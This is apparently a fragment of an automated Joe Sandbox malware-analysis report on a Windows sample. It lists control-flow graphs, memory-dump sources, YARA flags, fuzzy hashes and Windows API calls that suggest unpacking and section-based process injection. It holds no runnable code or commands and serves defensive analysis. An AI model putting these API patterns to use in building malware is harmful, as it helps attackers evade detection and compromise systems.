                                                                                                                                • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                                                                                                                                • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                                                                                                                                • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270442778.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_40b000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099061454-3916222277
                                                                                                                                • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                                • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                                                                                                                                • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                                • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 464 83067f-830698 465 83069a-83069c 464->465 466 8306a3-8306af CreateToolhelp32Snapshot 465->466 467 83069e 465->467 468 8306b1-8306b7 466->468 469 8306bf-8306cc Module32First 466->469 467->466 468->469 474 8306b9-8306bd 468->474 470 8306d5-8306dd 469->470 471 8306ce-8306cf call 83033e 469->471 475 8306d4 471->475 474->465 474->469 475->470
                                                                                                                                APIs
                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008306A7
                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 008306C7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270864226.000000000082D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_82d000_fbhbvci.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                • Instruction ID: 3bc0d13799b0d8b3974ec86f643cdd3e2641624d634309b98d6aad0b7d8888b5
                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                • Instruction Fuzzy Hash: E4F062321017146BD7203BF9A89EB6A76ECFFD9724F100528E642D24C0EA70E8454EA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 477 7b0e0f-7b0e24 SetErrorMode * 2 478 7b0e2b-7b0e2c 477->478 479 7b0e26 477->479 479->478
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,007B0223,?,?), ref: 007B0E19
                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,007B0223,?,?), ref: 007B0E1E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270658140.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7b0000_fbhbvci.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                • Instruction ID: ffcf5e6dbdd463b1daf0f9ee02433bdb2d1385e856eecc0e7ab2c7339d913e6a
                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                • Instruction Fuzzy Hash: 04D0123114512877D7003A94DC09BCE7B1CDF05B62F008411FB0DD9080C774994046E5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                                • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                                                                • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                                • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 537 83033e-830378 call 830651 540 8303c6 537->540 541 83037a-8303ad VirtualAlloc call 8303cb 537->541 540->540 543 8303b2-8303c4 541->543 543->540
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0083038F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270864226.000000000082D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_82d000_fbhbvci.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                • Instruction ID: e9be674c39a9a6248224b2a12f0f3f15d9d7153d5c06400c5c19730e2c191afb
                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                • Instruction Fuzzy Hash: 15113979A40208EFDB01DF98C985E99BBF5EF48351F0580A4F9489B362D371EA90DF81
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                                • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                                                                • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                                • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                                • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                                                                • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                                • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                                • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                                                                • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                                • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                                • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                                                                                                                                • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                                • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                                • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                                                                • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                                • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                                                                APIs
                                                                                                                                • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270442778.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_40b000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocLocal
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3494564517-0
                                                                                                                                • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                                • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                                                • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                                • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                                                                                                                                APIs
                                                                                                                                • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                                                                                                                                • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270442778.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_40b000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2776817195-0
                                                                                                                                • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                                • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                                                                                                                                • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                                • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                                                                                                                                APIs
                                                                                                                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270442778.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_40b000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                                • String ID: -
                                                                                                                                • API String ID: 2991353152-2547889144
                                                                                                                                • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                                • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                                                                                                                                • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                                • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797